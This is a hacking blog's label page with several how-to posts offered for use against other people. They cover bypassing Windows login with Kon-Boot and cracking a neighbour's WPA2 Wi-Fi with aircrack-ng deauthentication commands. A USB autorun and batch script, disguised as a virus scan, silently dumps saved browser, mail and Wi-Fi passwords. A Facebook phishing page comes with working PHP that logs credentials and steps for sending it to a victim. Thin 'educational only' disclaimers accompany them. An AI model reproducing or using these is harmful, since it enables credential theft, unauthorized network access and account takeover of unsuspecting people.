Labels
- .net FrameWork (1)
- About (1)
- AceTest (1)
- Android (60)
- BackTrack (4)
- Bat Virus (5)
- Block Ur Websites (2)
- Boot USB (1)
- Caret Browsing (1)
- CMD (1)
- computer tricks (20)
- Cracking (4)
- DataBase (3)
- DISABLE ANY SERVICES (1)
- DNS Spoofing (2)
- Dork (7)
- Download (1)
- Dual Boot of OS (1)
- E-books (1)
- Earn Money (1)
- Ebooks (21)
- Email (4)
- Exploits (3)
- Facebook (4)
- Facebook Hacking (6)
- Facebook Tricks (11)
- Firefox (1)
- FUN WITH GOOGLE (2)
- Funny Tricks (5)
- Gate (5)
- gmail hack (1)
- Google Apps (2)
- Google Code (1)
- Hack Email id (1)
- hack wep (1)
- hack wifi (1)
- hack wpa2 (2)
- Hacking (22)
- Hacking Movies (1)
- hacking tools (1)
- Hacking Tricks (18)
- Hardware Hacking (4)
- HIREN`S BOOT in USB (2)
- IE Shortcuts (1)
- Installation of OS (9)
- Internet (14)
- Internet Freedom (3)
- IP address (1)
- Iphone (3)
- Javascipt (1)
- Keyboad Shortcuts (7)
- KEYBOARD tricks (4)
- Linux (5)
- LIVE OS (1)
- LogOn Wallpaper (1)
- Mac OS (1)
- Make Money (14)
- MAKE MULTI Bootable ISO (2)
- Make ur Own Facebook site (1)
- Math (1)
- Mobile (3)
- Mobile Tricks (71)
- mozilla firefox (2)
- MS Office Shortcuts (1)
- My Certificate (2)
- Net Tools (1)
- Network (2)
- News (11)
- Notepad Tricks (16)
- Online Data Transfer (1)
- Online Gaming with Friends (2)
- OPENLX EDGE LINUX (1)
- Own free Domain (1)
- Paid (31)
- Papers (8)
- Password (8)
- PenDrive (4)
- Pendrive Bootable OS (6)
- Print Ur Graphical C Program (1)
- RECOVER UR DATA (1)
- Remote Connection (2)
- REMOVE Virus from Pendrive (2)
- Run Turbo C in Win 7 (1)
- Safe Mode Bypass (13)
- Script (41)
- Share Internet connection (2)
- Shell (4)
- SocialTwist (1)
- software (2)
- Softwares with VMware (1)
- SQL Injection (2)
- Surf blocked Websites (5)
- Symlink (4)
- talking computer (1)
- TINYURL of My Blog (1)
- Tips and Tricks (18)
- Tools (82)
- Tricks And Tutorials (122)
- Tricks for call (1)
- Twitter (1)
- unlock Card (1)
- Usb (1)
- Vidaliya Guide (1)
- Video Card (1)
- Video Tutorial (33)
- Virus (8)
- VMware Player (1)
- Vulenerbilty (31)
- WEB BROWSER (5)
- website hacking (4)
- Websites (1)
- Wifi (1)
- Window (9)
- Window Customize (2)
- windows (5)
- Windows 7 Shortcuts (1)
- Windows Password (1)
- Windows Shortcuts (2)
- Windows Tip (2)
- WINDOWS XP (1)
- Wireless Hacking (2)
- XSS Attack (1)
- Your Freedom (1)
- youtube (1)
Popular Posts
-
admin account info" filetype:log !Host=*.* intext:enc_UserPassword=* ext:pcf "# -FrontPage-" ext:pwd inurl:(service | authors...
-
1. Download Gmail hacker software to hack Gmail password. http://www.4shared.com/file/175280640/863ac191/Gmail_Hack.html 2. Now, ru...
-
Ddoser 3.4 - Credit to Online D0wnload Pass:-thisisthepass111 [DDoSeR] (Programmed in Delphi 7 By Sam) Ma...
-
This summary is not available. Please click here to view the post.
-
What is the Use of The Proxy? Hide your IP. Browse the Internet anonymously. 100 percentage working process list Share Here is the list of p...
Powered by Blogger.
Recent Comments
Showing posts with label Hacking. Show all posts
How TO Crack Windows Password Using Kon-Boot
It appears that removing Windows passwords on a machine where you lost the administrator password has become my passion. Kon-Boot is probably the fastest and easiest way to remove a Windows password. All you have to do is insert the Kon-Boot boot CD, and the tool does the rest for you.

Remove Windows Password -Kon Boot Welcome Screen
Shortly after the CD drive starts spinning, you will see the Kon-Boot welcome screen. At this point, you have to press a key for Kon-Boot to continue. Somehow this destroys the beauty of this tool because it would certainly be even cooler to hack Windows without touching a key.
After you press a key, a second “I-am-so-proud-to-be-hacker-screen” appears. You have to wait here until the ego screen finishes its display, and then Kon-Boot will finally do what it is supposed to do. The last part is very quick and only takes a fraction of the time that the tool needs to display its hello-world screens.

Kon-Boot changes the contents of the Windows kernel on the fly while booting allowing you to log on without password. Thus the tool doesn’t change the SAM database. If you reboot again without using Kon-Boot you need the old passwords.
Here You Download Kon-Boot
Kon-Boot Version 2.0
Kon-Boot version 2.1
Kon Boot USB Installation Guide:
1. Insert your USB thumb drive into your computer.
2. Run KonBootinstall.exe and select your thumb drive from the list, click enter. If multiple USB drives
appear, be sure to select the drive which corresponds to the proper thumb drive inserted.
This can be verified by browsing My Computer in Windows.
This installation will erase certain information on the thumb drive. Data can be potentially lost!
Be sure to backup before copying if needed.
3. Installation is now complete! You may begin using Kon Boot.
Note : First Format You Pen-Drive , Run as Administrator KonBootinstall.exe file.
Like Our Facebook-Fan Page: http://www.facebook.com/yamraajhacker.com
Remove Windows Password -Kon Boot Welcome Screen
Shortly after the CD drive starts spinning, you will see the Kon-Boot welcome screen. At this point, you have to press a key for Kon-Boot to continue. Somehow this destroys the beauty of this tool because it would certainly be even cooler to hack Windows without touching a key.
After you press a key, a second “I-am-so-proud-to-be-hacker-screen” appears. You have to wait here until the ego screen finishes its display, and then Kon-Boot will finally do what it is supposed to do. The last part is very quick and only takes a fraction of the time that the tool needs to display its hello-world screens.
Kon-Boot changes the contents of the Windows kernel on the fly while booting allowing you to log on without password. Thus the tool doesn’t change the SAM database. If you reboot again without using Kon-Boot you need the old passwords.
Here You Download Kon-Boot
Kon-Boot Version 2.0
Kon-Boot version 2.1
Kon Boot USB Installation Guide:
1. Insert your USB thumb drive into your computer.
2. Run KonBootinstall.exe and select your thumb drive from the list, click enter. If multiple USB drives
appear, be sure to select the drive which corresponds to the proper thumb drive inserted.
This can be verified by browsing My Computer in Windows.
This installation will erase certain information on the thumb drive. Data can be potentially lost!
Be sure to backup before copying if needed.
3. Installation is now complete! You may begin using Kon Boot.
Note : First Format You Pen-Drive , Run as Administrator KonBootinstall.exe file.
Like Our Facebook-Fan Page: http://www.facebook.com/yamraajhacker.com
How to Crack a Wpa2-Psk Password with Windows
How to Crack a Wpa2-Psk Password with Windows :-
It,s very common question on the internet to How to hack a Facebook account password and how to hack a WiFi password. Even if you search on YouTube you will find a lots of tutorial to How to hack a WiFi password using backtrack. However, backtrack OS is not most handy OS for normal users. yesterday my one Facebook friend Lovito Tsuqu Kiho ask me to how to hack WiFi using commview using aircrack-ng.
Today i am going to show you how to a crack a Wp2-psk password with windows machine.
Software Requirement for this lab :-
1. CommView for Wifi ( Download )
2. Elcomsoft Wireless Security Auditor ( Download )
Presently i am connected with my own wifi network Virusfound and i want to hack the password of Ultimate that is secured with Wpa2-psk encryption.
First you need to be capture the Wpa2, four-way handsake with CommView.
Open commView and click on the Start option
then click on the capture option to start the capture
now it will show you all available AP, Now click on the Tools > Select the Node Reassoication option ( if Node Rassociation is not working , then use WiFi Alfa card )
now select your target AP in the Send a deauthentication request from this AP option. it will show you all available client option.
now click on the Send Now option to send the packet for 4-way authentication. wait for some time so it will capture the packet.
now click on the Save option and choose your file format Commview Capture Files (*.ncf)
you capture work is done.
Now open Elcomsoft Wireless Security Auditor to crack your wifi password.
Click on the Import Data tab > select the Import CommViewLog option.
now it will show you information about AP and Multiple Handshake selection information. Click on Ok.
now click on the Start attack option and select the Dictionary Attack option. However you have other attack options are also available.
now within minutes it will found your password and it will show you the password.
Enjoy Wifi Hacking with Windows machine.
Like us on FACEBOOK
Hack wifi/WEP/WPA2 password using aircrack-ng
Now a days, We find our neighbour WiFi network but when we try to connect it say to enter password. they are put password in form of WEP or WPA/WPA2. Here is some trick to hack or Crack the wireless/WiFi password using aircrack-ng.
In my previous article I saw you to How to crack wifi or wireless password using Backtrack.
Hacking wireless wifi passwords
The most common type of wireless security are Wired Equivalent Privacy (WEP) and
Wi-Fi protected Access (WPA).
WEP was the original encryption standards for wireless so that wireless networks can be secured as
wired network. There are several open source Utilities like aircrack-ng, weplab, WEPCrack, or
airsnort that can be used by crackers to break in by examining packets and looking for patterns in the
encryption. WEP comes in different key sizes. The common key lengths are currently 128- and 256-bit in WEP.
Latter WAP and WAP2 was introduced to overcome the problems of WEP. WAP was based on
security protocol 802.11i replacing the 802.11 of WEP. Using long random passwords or passphrases
makes WPA virtually uncrackable however if a small password is used of less than 14 words it can be
cracked in less than one minute by aircrack-ng, mostly uses passwords of less than 14 words so use aircrack-ng for hacking .
Securing Wireless Network
The first step of securing wireless connection is simply using a long random passwords atleast of
14 characters. Now if your wifi device supports for WPA2 than use it, as many users don’t know that
their device supports for many security encryption techniques. Check your router security techniques supported which is in its configuration page.
If you don’t know how to edit routers setting than just open your browser and type 192.168.1.1 in
addressbar and here you will get your routers configuration, where you can select.
Cracking Wireless Network
As we have read above this is an easy task, we just have to use our network card in monitor mode so
as to capture packets from target network. And this NIC mode is driver dependent and network can be monitored using aircrack-ng. But only small number if cards support this mode under windows.
But you can use live CD of any linux OS (commonly BackTrack ) or install linux OS as virtual machine.
List of compatible cards.
Now download aircrack-ng for linux or windows platform from HERE.
The aircrack-ng suite is a collection of command-line programs aimed at WEP and WPA-PSK key
cracking. The ones we will be using are:
airmon-ng - script used for switching the wireless network card to monitor mode
airodump-ng - for WLAN monitoring and capturing network packets
aireplay-ng - used to generate additional traffic on the wireless network
aircrack-ng - used to recover the WEP key, or launch a dictionary attack on WPA-PSK using the captured data.
Using aircrack-ng
First, put the card in monitor mode :
root@bt:~# airmon-ng
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
root@bt:~# airmon-ng start wlan0
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
(monitor mode enabled on mon0)
Ok, we can now use interface mon0
Let’s find a wireless network that uses WPA2 / PSK :
root@bt:~# airodump-ng mon0
CH 6 ][ Elapsed: 4 s ][ 2009-02-21 12:57
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:19:5B:52:AD:F7 -33 5 0 0 10 54 WPA2 CCMP PSK TestNet
BSSID STATION PWR Rate Lost Packets Probe
00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -29 0- 1 12 4 TestNet
Stop airodump-ng and run it again, writing all packets to disk :
airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2
At this point, you have 2 options : either wait until a client connects and the 4-way handshake is
complete, or deauthenticate an existing client and thus force it to reassociate. Time is money, so let’s
force the deauthenticate. We need the bssid of the AP (-a) and the mac of a connected client (-c)
root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0
13:04:19 Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10
13:04:20 Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]
As a result, airodump-ng should indicate “WPA Handshake:” in the upper right corner
CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:19:5B:52:AD:F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet
BSSID STATION PWR Rate Lost Packets Probe
00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -27 54-54 0 230
Stop airodump-ng and make sure the files were created properly
root@bt:/# ls /tmp/wpa2* -al
-rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap
-rw-r--r-- 1 root root 476 2009-02-21 13:04 /tmp/wpa2-01.csv
-rw-r--r-- 1 root root 590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv
Form this point forward, you do not need to be anywhere near the wireless network. All cracking will
happen offline, so you can stop airodump and other processes and even walk away from the AP. In fact,
I would suggest to walk away and find yourself a cosy place where you can live, eat, sleep, etc.
Cracking a WPA2 PSK key is based on bruteforcing, and it can take a very very long time.
There are 2 ways of bruteforcing : one that is relatively fast but does not guarantee success and one
that is very slow, but guarantees that you will find the key at some point in time.
The first option is by using a worklist/drstionary file. A lot of these files can be found on the internet (e.g.www.theargon.com or on packetstorm (see the archives)), or can be generated with tools such
as John The Ripper. Once the wordlist is created, all you need to do is run aircrack-ng with the
worklist and feed it the .cap fie that contains the WPA2 Handshake.
So if your wordlist is called word.lst (under /tmp/wordlists), you can run
aircrack-ng –w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap
The success of cracking the WPA2 PSK key is directly linked to the strength of your password file. In
other words, you may get lucky and get the key very fast, or you may not get the key at all.
The second method (bruteforcing) will be successfull for sure, but it may take ages to complete.
Keep in mind, a WPA2 key can be up to 64 characters, So in theory you would to build every
password combination with all possible character sets and feed them into aircrack.
Hope you enjoy(-_-) this post.!
Note: This tutorial is only for Educational Purposes..
Steal All Passwords Of Computer Using USB
How to steal passwords from a computer with USB in just seconds???
Here is the tutorial you want fanz, you can steal any pass means all passwords related to that computer. it can also steal once saved browser passes.
Tutorial:
How to make stealer?
Download This Ready made Files or make your own way as shown below. Pass Stealer
Or Custom Making of stealer:
Type or copy/paste Text below:-
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
Save this as AUTORUN.inf (NOTE: extension must be .inf not .txt)
Step 2: Now again open Notepad and Create a new file.
Type or copy/paste Text below…
start mspass.exe /stext pass/mspass.txt
start mailpv.exe /stext pass/mailpv.txt
start iepv.exe /stext pass/iepv.txt
start pspv.exe /stext pass/pspv.txt
start PasswordFox.exe /stext pass/passwordfox.txt
start OperaPassView.exe /stext pass/OperaPassView.txt
start ChromePass.exe /stext pass/ChromePass.txt
start WebBrowserPassView.exe /stext pass/AllBrowserPass.txt
start mspass.exe /stext pass/msofficepass.txt
start RouterPassView.exe /stext pass/Router.txt
start Dialupass.exe /stext pass/Dialupass.txt
start netpass.exe /stext pass/netpass.txt
start WirelessKeyView.exe /stext pass/WirelessKeyView.txt
Save this as LAUNCH.bat
Now you have 2 files…
Step 3: Copy the autorun and launch file to your USB…
Step 4: Go to http://www.nirsoft.net/
And download the programs which you named in Step 2… and copy them with your other files that is autorun and launch.bat files.
How to use?
- Now copy our ready made pass stealer files or your setup files to your usb drive.
- Now re-plug USB.
- Choose Perform A Virus Scan Option, on auto-run menu.
- Era..!!! All Pass r steal and in pass folder.
- You can run launch.bat file direct and steal pass.
Note: These File are may be deleted by antivirus. So be care-full.
Proof:
Hacking passwords and id is under crime. you will get caught by police if you do that. I am sharing knowledge for education purpose only.Not my responsibility if you caught bye hacking. Do not hack passwords.
How to Hack Facebook Password using Phishing Page
phishing: Phishing is attempting to acquire information (and sometimes, indirectly, money) such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail spoofing or instant messaging,and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents includelegislation, user training, public awareness, and technical security measures.
today we create a facebook phishing page which look similar to a facebook page but it's not actually a facebook page,when victim enter his username and password you will be able to see that.Interesting.....
Today i m gonna teach you how to hack a facebook account with a phishing page.
Downloaded Phishing Page Click here.
Upload Directly to 000webhost.com and Use get link Directly.
Note: Files Upload on public_html Only ...
here is a video See Here:
Upload Directly to 000webhost.com and Use get link Directly.
Note: Files Upload on public_html Only ...
here is a video See Here:
steps to create a phishing page:
1.Go to the Facebook page ,and then right click on the page, u will see the option view source page,click on that.
2.now a new tab will open which contain a source code,Select all the stuff and paste it in a notepad.
4.You will have to find a text which looks like ..
action="https://www.facebook.com/login.php?login_attempt=1"
5.delete all the text written in red colour and instead of it write post.php.then it will look like...
action="post.php"
6.Now save it on your desktop with the name index.htm,not index.html,remember.
7.Now your phishing page is ready.it will look like a pic given below .
8.Open a new notepad and save the given data with the name post.php.
<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
9.You have two files now one is index.htm and another is post.php,remember file extension is important.
10.Now u have to upload it in a web hosting site ,i prefer u to use www.000webhost.com or else www.,my3gb.com.
11.I prefer u to use 000webhost because it will be easy to use.
12.You have to make a account in that ,after that it looks like a picture given below.
13.Now go control pannel,then on file manager.
14.After that a new window will pop up.Now go to public_html.
15.Delete the file named default.php,after that upload two files index.htm and post.php one by one .
16.Now the last step click on view of index.htm it will look same as facebook page.
17.Copy the url of that page and send this link to your victim,when your victim try to login in to it with the username and password .the page redirectly connect to facebook. and you will be now able to see his password.
18.Open your 000webhost account and go to file manager then public_html,here you find a new file named username.txt.
19.Click on view now u will have your friend's password and email id.
20.This is a simple trick to hack any Facebook password account by phishing page.
21.If you are not able to create a phishing page then i will provide u a video tutorial link,look
in to the description of that video u will find a prepared module of phishing pages,download
it and enjoy.
![]() |
index |
8.Open a new notepad and save the given data with the name post.php.
<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
9.You have two files now one is index.htm and another is post.php,remember file extension is important.
10.Now u have to upload it in a web hosting site ,i prefer u to use www.000webhost.com or else www.,my3gb.com.
11.I prefer u to use 000webhost because it will be easy to use.
12.You have to make a account in that ,after that it looks like a picture given below.
13.Now go control pannel,then on file manager.
14.After that a new window will pop up.Now go to public_html.
15.Delete the file named default.php,after that upload two files index.htm and post.php one by one .
16.Now the last step click on view of index.htm it will look same as facebook page.
![]() |
this is your Facebook phishing page |
17.Copy the url of that page and send this link to your victim,when your victim try to login in to it with the username and password .the page redirectly connect to facebook. and you will be now able to see his password.
18.Open your 000webhost account and go to file manager then public_html,here you find a new file named username.txt.
19.Click on view now u will have your friend's password and email id.
20.This is a simple trick to hack any Facebook password account by phishing page.
21.If you are not able to create a phishing page then i will provide u a video tutorial link,look
in to the description of that video u will find a prepared module of phishing pages,download
it and enjoy.
Tag :
Facebook Hacking,
Hacking,